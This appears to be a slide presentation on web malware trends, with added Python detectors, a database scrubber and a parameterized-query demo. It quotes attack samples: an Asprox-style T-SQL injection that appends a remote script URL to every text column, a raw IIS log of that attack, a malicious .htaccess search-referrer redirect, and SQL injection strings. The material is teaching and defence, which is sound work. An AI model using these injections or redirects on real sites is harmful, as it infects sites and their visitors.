
Web-Based Malware Menace Spreading Fast
Presented by: Garry Bennett, Marcelo Berger, Kelley Gambera, Elsa Madrigal, David Pessis, Chuck Roth, Fred Salchli




1 Web-Based Malware Menace Spreading Fast
Presented by: Garry Bennett, Marcelo Berger, Kelley Gambera, Elsa Madrigal, David Pessis, Chuck Roth, Fred Salchli

2 Malware Behavior is Changing
- Malware is no longer exclusive to malicious sites
- Malware is making its way onto end-user machines with no user interaction required
- Malware is establishing a presence on the end-user machine
- There has been explosive growth in new malicious code signatures
[Table 1. New malicious code signatures. Source: Symantec Corporation]

3 Interesting Trends
- Malware is targeting mainstream sites
  - In 2008, Economist.com and MLB.com were both hit
  - Malware authors used DoubleClick's ad-serving software
  - Unsuspecting users clicked on what looked to be legitimate ads, but were actually clicking on a Trojan which installed itself on the user's hard drive to collect personal information
- Malware authors are now looking for a bigger audience
  - Mainstream sites provide this base
  - Users who go to these sites are less likely to be concerned about being the victim of a malware attack
  - This is an increasing problem, since the notion of being safe if one visits only good sites no longer holds true
- Web servers have evolved into complex code
  - No longer a static page
  - Third-party hosted material
  - Network-layer communication and exposed weaknesses

4 Attack Techniques
- SQL injection
- Malicious advertisements
- Search engine result redirection
- Attacks on backend virtual hosting companies
- Vulnerabilities in Web server or forum hosting software
- Cross-site scripting (XSS) attacks

5 Attacks Not Mentioned in Paper
- Sniffing and interception (HTTP vs. HTTPS)
- DNS server vulnerability exploits
  - Allow malicious sites to be served
- Authenticity attacks

6 More Popular Attack Techniques: SQL Injection
- Large, high-traffic sites have databases running in the background
  - Read/write user interaction
  - Security must extend to databases and data
- How it works:
  - Attacker identifies input form vulnerabilities
  - Hacker inserts additional SQL instructions
  - Hacker can then navigate the database and add malicious content
    - Hidden links
    - E.g. Trojan.Asprox

7 SQL Injection: Attack at Duo!
- Longstanding client
- Client merged with another company that had an existing e-commerce application
- We hesitantly agreed to integrate and host the e-commerce application
- Code review and testing indicated security problems
  - Client pushed back on risk assessment and claimed e-commerce site would be retired in very near future
- Two years later...

8 SQL Injection
- First Order Attack
  - Attacker gains access to the database and can perform DML and/or DDL commands
- Second Order Attack
  - Attacker inserts data into the database
- Our attacker did both
  - Client called to report strange links appearing within the product pages of their site

9 SQL Injection: Raw IIS Log

    2008-04-12 17:59:39 W3SVC658304687 WEB14A POST /productcart/pc/viewCat_P.asp idCategory=57;DECLARE @S NVARCHAR(4000);SET @S= CAST(0x… [hex payload and remainder of request truncated in transcript] …ozilla/3.0+(compatible;+Indy+Library) - - www.clientname.com 200 0 0 471 2377 2562
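The raw log line above is where this attack first becomes visible to a defender. The following is an added example (not code from the presentation) of a small detector that walks IIS log lines in the slide's field order, URL-decodes the query string, flags T-SQL keywords that never belong in an idCategory parameter, and decodes the CAST(0x... AS NVARCHAR) hex blob so an analyst can read what was executed. The log lines and the hex payload are constructed here from a harmless fragment; the field positions are an assumption taken from the slide's layout.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines in the shape of the slide's IIS entry (not real traffic).
# The hex blob is built here from a harmless T-SQL fragment; NVARCHAR casts decode
# their hex as UTF-16LE, which is why the decoder tries that encoding first.
SAMPLE_PAYLOAD = "DECLARE @T varchar(255)".encode("utf-16-le").hex().upper()
SAMPLE_LOG = [
    "2008-04-12 17:59:39 W3SVC658304687 WEB14A POST /productcart/pc/viewCat_P.asp "
    "idCategory=57;DECLARE+@S+NVARCHAR(4000);SET+@S=CAST(0x" + SAMPLE_PAYLOAD
    + "+AS+NVARCHAR(4000));EXEC(@S); "
    "Mozilla/3.0+(compatible;+Indy+Library) - - www.clientname.com 200 0 0 471 2377 2562",
    "2008-04-12 18:01:02 W3SVC658304687 WEB14A GET /productcart/pc/viewCat_P.asp idCategory=57 "
    "Mozilla/4.0+(compatible;+MSIE+7.0) - - www.clientname.com 200 0 0 471 150 30",
]

# Assumed field order (taken from the slide): date time site server method uri query ua ...
URI_FIELD, QUERY_FIELD = 5, 6

# T-SQL keywords that have no business inside a numeric category parameter
SQL_TOKENS = re.compile(r"\b(declare|cast|exec|nvarchar|set|select|update)\b", re.IGNORECASE)
# CAST(0x<hex> AS NVARCHAR(...)) is the encoding trick the slide's request uses
HEX_CAST = re.compile(r"cast\(\s*0x([0-9a-f]+)\s+as\s+n?varchar", re.IGNORECASE)


def decode_hex_payload(hexstr):
    """Decode the hex blob as UTF-16LE (what an NVARCHAR cast yields), else latin-1."""
    raw = bytes.fromhex(hexstr)
    for enc in ("utf-16-le", "latin-1"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text.isprintable():
            return text
    return None


def inspect_line(line):
    """Return a finding dict for a suspicious request, or None for a normal one."""
    fields = line.split(" ")
    if len(fields) <= QUERY_FIELD:
        return None
    query = unquote_plus(fields[QUERY_FIELD])
    tokens = sorted({t.lower() for t in SQL_TOKENS.findall(query)})
    cast = HEX_CAST.search(query)
    # Two or more T-SQL keywords, or any hex CAST, in a query string is the signature here
    if not cast and len(tokens) < 2:
        return None
    return {
        "time": fields[0] + " " + fields[1],
        "uri": fields[URI_FIELD],
        "tokens": tokens,
        "decoded": decode_hex_payload(cast.group(1)) if cast else None,
    }


def scan(lines):
    """Run inspect_line over every log line and keep only the findings."""
    return [f for f in (inspect_line(line) for line in lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Decoding the blob matters more than the keyword match: the keywords tell you a request was hostile, the decoded text tells you which tables and columns it touched, which is what the cleanup on the later slides needs.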

10 SQL Injection: 1st Order Attack

    POST /productcart/pc/viewCat_P.asp idCategory=57;
    DECLARE @S NVARCHAR(4000);
    SET @S= "DECLARE @T varchar(255),@C varchar(255)
             DECLARE Table_Cursor CURSOR FOR
               select a.name,b.name from sysobjects a,syscolumns b
               where a.id=b.id and a.xtype='u'
               and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)"
    AS NVARCHAR(4000));
    EXEC(@S);

11 SQL Injection: 2nd Order Attack

    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
      exec('update ['+@T+'] set ['+@C+']= rtrim(convert(varchar,['+@C+']))+ '' ''')http://www.axxxr.com/1.js
      FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor

12 SQL Injection: Remediation
- We immediately shut down the application
- We built a scrubber which scanned database tables for the signature and removed malicious calls
- E-commerce site was disintegrated from main site
- Unhappy client; unhappy service provider
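The scrubber mentioned on the remediation slide is the defensive mirror of the cursor loop on slides 10 and 11: the attack enumerated every text column of every user table and appended a script tag, so the cleanup has to enumerate the same columns and strip that tag. The block below is an added example (not the presenters' scrubber) written against an in-memory SQLite database with constructed product tables; the enumeration uses sqlite_master and PRAGMA table_info in place of sysobjects/syscolumns, and the injected tag uses the script URL shown on the slide. A dry-run mode reports what would change before anything is updated.

```python
import re
import sqlite3

# Signature of the second-order payload: a <script src=...></script> tag appended to
# the end of text column values. The script domain is the one shown on the slide.
INJECTED_TAG = '<script src=http://www.axxxr.com/1.js></script>'
SCRIPT_SIG = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"']?[^\"'\s>]+[^>]*>\s*</script>", re.IGNORECASE
)


def build_sample_db():
    """Constructed e-commerce tables with the injected tag in some cells (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (sku TEXT, name VARCHAR(255), description TEXT, price REAL)")
    conn.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, title NVARCHAR(100))")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?, ?)",
        [
            ("A1", "Widget", "A fine widget" + INJECTED_TAG, 9.99),
            ("A2", "Gadget" + INJECTED_TAG, "A fine gadget" + INJECTED_TAG, 19.99),
            ("A3", "Doohickey", "Untouched description", 4.50),
        ],
    )
    conn.executemany(
        "INSERT INTO categories (title) VALUES (?)", [("Tools" + INJECTED_TAG,), ("Toys",)]
    )
    conn.commit()
    return conn


def text_columns(conn):
    """Enumerate (table, column) pairs of character type, the way the attack's cursor
    did with sysobjects/syscolumns; here via sqlite_master and PRAGMA table_info."""
    pairs = []
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'"
    ).fetchall()
    for (table,) in tables:
        for _cid, col, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if any(kind in ctype.upper() for kind in ("CHAR", "TEXT", "CLOB")):
                pairs.append((table, col))
    return pairs


def scrub(conn, dry_run=False):
    """Strip the injected tag from every text column; return {(table, col): cells_cleaned}."""
    report = {}
    for table, col in text_columns(conn):
        rows = conn.execute(
            f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ?', ("%<script%",)
        ).fetchall()
        for rowid, value in rows:
            cleaned, hits = SCRIPT_SIG.subn("", value)
            if hits == 0:
                continue
            report[(table, col)] = report.get((table, col), 0) + 1
            if not dry_run:
                conn.execute(
                    f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?', (cleaned.rstrip(), rowid)
                )
    conn.commit()
    return report


def remaining_infected_cells(conn):
    """Count text cells still carrying a <script tag (verification pass after scrubbing)."""
    total = 0
    for table, col in text_columns(conn):
        total += conn.execute(
            f'SELECT COUNT(*) FROM "{table}" WHERE "{col}" LIKE ?', ("%<script%",)
        ).fetchone()[0]
    return total


if __name__ == "__main__":
    db = build_sample_db()
    print("dry run:", scrub(db, dry_run=True))
    print("cleaned:", scrub(db))
    print("still infected:", remaining_infected_cells(db))
```

Table and column names come from the catalog, not from user input, which is why building them into the statement with identifier quoting is acceptable here; the values being written back still go through bound parameters. Running the dry run first and keeping the report is what lets you show the client exactly which cells were touched.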

13 More Popular Attack Techniques: Malicious Ads
- Malware delivered via what appears to be a real ad
- Issues:
  - Not all advertisers validate the ads hosted on legitimate sites
  - The nature of advertising/online publishing mechanisms is dynamic and automated, and thus difficult to trace
  - Authored using JavaScript
    - Functions can be easily misused to silently redirect the user to a malicious page, regardless of whether the hosting site remains clean
  - Ads are hard to detect because they rotate quickly
    - Rotate based on search parameters and/or end-user geography
  - Web site and ad publishers are unaware that ads contain malware

14 More Popular Attack Techniques: Malicious Ads
- How malicious ads work:
  - Pop up over a web site and redirect the user to a web page filled with malicious software
  - Entice the user to click a link, which results in loading of a malicious web site
  - Auto-redirects often utilize Flash technology, whereas click-throughs use JavaScript or ActiveX to create a pop-up with clickable options
Additional source: Smart Computing, "How to Get Rid of Malicious Ads," May 2008, http://www.smartcomputing.com/editorial/article.asp?article=articles%2F2008%2Fs1905%2F25s05%2F25s05.asp

15 More Popular Attack Techniques: Search Engine Result Redirection
- Poisoned keywords related to popular searches
  - Metatags in web pages used to perform search engine optimization
  - Example: Easter verse, Easter verse poems, Easter greeting card verses
- Redirects to malware sites
  - Malware is downloaded
  - Misleading apps are downloaded: anti-virus, Windows updates, etc.
- Detection avoidance:
  - Referrer checking: avoid researchers who could be investigating the referral to the site
  - Modify HTTP headers to avoid caching of pages
    - No-store, No-cache
Source: http://cyberinsecure.com/easter-related-search-engine-results-poisoned-redirect-users-to-malicious-applications/

16 More Popular Attack Techniques: Backend Virtual Hosting Companies
- Virtual hosting companies provide Web server hosting services to other companies or individuals
- Attacking virtual hosts provides hackers with an avenue to infect multiple sites associated with the hosts
  - GoDaddy.com DDoS attack: hackers knocked down a number of client Web sites for several hours in 2007
- Techniques for compromising legitimate client Web sites:
  - Exploit applications on the host to inject malicious code (HTML iframes), and the host then injects the same code into client sites
  - DNS spoofing attack using the virtual host name

17 How Malware Authors Reach Users
- Get onto the user's computer automatically
  - DNS cache poisoning
  - Drive-by download
  - Software vulnerabilities
  - Web attack toolkits
  - Cat-and-mouse game
    - Obfuscation
    - Dynamically changing URLs and malware
  - Clickjacking
- Get onto the user's computer with help from the user
  - Fake codec
  - Malicious P2P files
  - Malicious ads
  - Fake scanner web page
  - Blogs

18 Drive-By Download
- User just browses a site and executable content is auto-downloaded onto the user's computer without their knowledge
- True four years ago... browsers are more defensive today
  - Degrees of insecurity according to corporate policies
  - Some apps are only supported by older browser versions
- No user interaction required
- "Good" web sites are targeted by attackers to establish user trust
- Issue:
  - OS and browser may have the latest patches, but multimedia plug-ins and document viewers are out of date and vulnerable
- Attack method:
  - Hidden IFrame causes the user's browser to silently pull malicious content
  - Malware authors are then able to exploit OS, browser, etc. vulnerabilities and eventually pull personal information
- Entire attack is invisible to the user

19 Other Automatic Attack Methods
- Software vulnerabilities
  - "Bugs" or flaws in applications
  - Attacker can compromise the system on which the software is installed
- Web attack toolkits
  - Off-the-shelf software written to probe the user's computer and automatically exploit security holes
- Obfuscation
  - Encryption of malcode, typically in JavaScript
- Dynamically changing URLs and malware
  - Malicious domains which appear to be real ones associated with search engine statistics
- Clickjacking
  - Attacker puts an invisible layer on a Web page and the user unknowingly clicks "fake" buttons or links to malware

20 Older Detection Techniques No Longer Work
- Older, signature-based antivirus-only detection techniques are far less effective
  - Multimedia, reader, browser, and third-party software vulnerabilities are hard to detect using traditional virus signatures
  - Traditional antivirus software only knows how to search in files, not on the network
  - Attacks are invisible
- New methods for detection are necessary
- Security is heavily dependent on the user's habits
  - i.e. the user needs to keep up with patches, security updates, etc.
- Security lockdown is practiced by website owners who have high stakes in secure web transactions

21 User-Assisted Attack Methods
- Social engineering
  - People are tricked into performing actions
- Examples:
  - Fake codec
    - A codec is software that can decode a binary file and reconstitute a version of the original audio or video
    - "Tempting" content gives malware authors the ability to get users to install a new codec to reach the desired content
    - Screenshot shows a fake codec to install for a video, but instead it's malware
    - Trojan is installed and infects the user's computer
  - Malicious P2P files
    - Files using celebrity names or popular brand names

22 User-Assisted Attack Methods (cont'd)
- Examples:
  - Malicious ads
    - One of the most blatant techniques
    - Direct advertisement of malware to unsuspecting users (in contrast to using actual product/company names)
    - E.g. fake copy of a newly-released game
  - Fake scanner web page
    - Leverages the JavaScript capabilities of a browser
    - Content appears to be a legitimate OS alert notification
    - A "scare tactic" approach to get users to execute malware
  - Blogs
    - Bogus links which point to malware

23 Symantec Top Web Threats 2008
- Drive-by downloads
- Obfuscation
- Targeting browser plug-ins instead of just the browser
- Misleading apps
- SQL injection in mainstream sites
- Unique and targeted malware
- 'Polymorphing' tools

24 New Threats for 2009 and Beyond
- Bogus services
  - Legal, financial, car transport
  - "Mule" recruitment sites
  - Spam
  - Professional-looking sites
- Social networking vulnerabilities with Web 2.0**
  - Hacked accounts
  - Cross-Site Scripting (XSS)
  - Cross-Site Request Forgery (CSRF)
  - Phishing
  - Information leakage
  - Injection flaws (JavaScript, XML, XPath, JSON)
  - Information integrity (i.e. wrong entries on Wikipedia)
  - Insufficient anti-automation
    - Vulnerable to brute force and CSRF attacks
- High-visibility news events
  - Quick distribution of malware
- Replacement of email attachments with hyperlinks
[Figure: Twitter CSRF attack]
**Source: Top Web 2.0 Security Threats, Secure Enterprise 2.0 Forum

25 Methods of Defense
- Techniques for counteracting Web-based attacks
  - User awareness (don't click on anything funny)
  - Don't download apps you don't trust
  - Keep your OS updated
  - Use anti-phishing, anti-malware, and anti-spam software
- No single silver bullet... just a bunch of silver BBs...

26 Garry's Slides

27 SQL Injection Example

    // a good user's name
    $name = "timmy";
    $query = "SELECT * FROM customers WHERE username = '$name'";
    echo "Normal: " . $query . " ";

    // user input that uses SQL Injection
    $name_bad = "' OR 1'";

    // our MySQL query builder, however, not a very safe one
    $query_bad = "SELECT * FROM customers WHERE username = '$name_bad'";

28 SQL Injection Example - Cont.

    // display what the new query will look like, with injection
    echo "Injection: " . $query_bad;

Output:

    Normal: SELECT * FROM customers WHERE username = 'timmy'
    Injection: SELECT * FROM customers WHERE username = '' OR 1''
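The two slides above show what the injected query text looks like but stop short of running it. The block below is an added example (not the presentation's PHP) that executes both constructions against a constructed in-memory SQLite customers table: the slide's string-pasting query builder beside a parameterized query. It uses the payload `' OR '1'='1`, a common variant of the slide's `' OR 1'` that parses cleanly in SQLite, so the vulnerable path returns every customer while the parameterized path treats the same bytes as a literal username and matches nothing.

```python
import sqlite3


def make_db():
    """Constructed customers table (sample data, not the presentation's database)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO customers VALUES (?, ?)",
        [("timmy", "timmy@example.com"), ("alice", "alice@example.com"), ("bob", "bob@example.com")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, name):
    """Same construction as the slide: the untrusted value is pasted into the SQL text,
    so quotes inside it become part of the statement's grammar."""
    query = f"SELECT username FROM customers WHERE username = '{name}' ORDER BY rowid"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, name):
    """Parameterized query: the driver sends the value separately from the statement,
    so it can only ever be compared as data, never change the WHERE clause."""
    rows = conn.execute(
        "SELECT username FROM customers WHERE username = ? ORDER BY rowid", (name,)
    )
    return [row[0] for row in rows]


def demo():
    """Run both lookups with a normal name and with an injection payload."""
    conn = make_db()
    good = "timmy"
    bad = "' OR '1'='1"  # constructed payload; yields ... WHERE username = '' OR '1'='1'
    return {
        "vulnerable_good": lookup_vulnerable(conn, good),
        "vulnerable_bad": lookup_vulnerable(conn, bad),
        "safe_good": lookup_safe(conn, good),
        "safe_bad": lookup_safe(conn, bad),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label}: {result}")
```

The fix is not escaping quotes in the application code but moving the value out of the statement text entirely; every mainstream database driver, including PHP's PDO and mysqli, supports this with prepared statements.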

29 More Popular Attack Techniques: Search Engine Results Redirection
- Legitimate sites that have been hacked to redirect to various rogue anti-malware "scan" sites
- The malicious redirect only occurs when a user arrives at the site via search engine results
  - Visiting the site directly (i.e. via a bookmark or manually entering the address) results in no redirect
  - Site owners visiting their site directly won't see any evidence of the redirect
- Since many sites receive a majority of their traffic from search engines, that large majority of users will keep getting redirected to the malicious site

30 More Popular Attack Techniques: Search Engine Result Redirection Example
The root cause of many of these hacks is a maliciously modified .htaccess file, commonly used on Apache web servers:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC]
    ...
    RewriteRule .* http://badsite-omitted/ [R=301,L]

In some cases it's replaced completely; in other cases the bad rules are added to the existing contents.
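Because the site owner never arrives via a search engine, the fastest way to catch this is to audit the file itself rather than browse the site. The block below is an added example (not from the presentation) of a small .htaccess auditor: it reads the file line by line, collects RewriteCond lines that test HTTP_REFERER against the search-engine names listed on the slide, and reports any following RewriteRule whose target is an off-site URL. The sample .htaccess and the `own_hosts` list are constructed; the redirect target is the placeholder shown on the slide.

```python
import re

# Search-engine names the slide's malicious conditions test the Referer against
SEARCH_ENGINE_NAMES = ("google", "yahoo", "msn", "ask", "aol", "altavista", "netscape")

COND_RE = re.compile(
    r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?", re.IGNORECASE
)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.IGNORECASE)

# Constructed .htaccess: one legitimate same-site redirect followed by the slide's pattern.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteRule ^old-page\\.html$ /new-page.html [R=301,L]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC]
RewriteRule .* http://badsite-omitted/ [R=301,L]
"""


def _is_redirect(flags):
    """True if the rule's flag list contains R or redirect (with or without a status code)."""
    for flag in (flags or "").split(","):
        if flag.strip().split("=")[0].strip().lower() in ("r", "redirect"):
            return True
    return False


def audit_htaccess(text, own_hosts=()):
    """Flag RewriteRules that send visitors off-site only when the Referer is a search engine.

    own_hosts: hostnames that count as this site (constructed; supply your own)."""
    findings = []
    referer_conds = []  # (line number, pattern) gathered until the next RewriteRule
    for lineno, line in enumerate(text.splitlines(), start=1):
        cond = COND_RE.match(line)
        if cond:
            pattern = cond.group(1).lower()
            if any(name in pattern for name in SEARCH_ENGINE_NAMES):
                referer_conds.append((lineno, pattern))
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue
        target, flags = rule.group(2), rule.group(3)
        target_l = target.lower()
        off_site = target_l.startswith(("http://", "https://")) and not any(
            host.lower() in target_l for host in own_hosts
        )
        if referer_conds and off_site:
            findings.append({
                "rule_line": lineno,
                "cond_lines": [n for n, _ in referer_conds],
                "target": target,
                "redirect": _is_redirect(flags),
            })
        referer_conds = []  # RewriteCond lines apply only to the RewriteRule that follows them
    return findings


if __name__ == "__main__":
    for finding in audit_htaccess(SAMPLE_HTACCESS, own_hosts=("www.example.com",)):
        print(finding)
```

Pair this with a baseline hash of every .htaccess under the document root: the auditor catches the pattern on the slide, the hash comparison catches the "replaced completely" case regardless of what the new rules look like.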

31 More Popular Attack Techniques: Malicious Ads Example

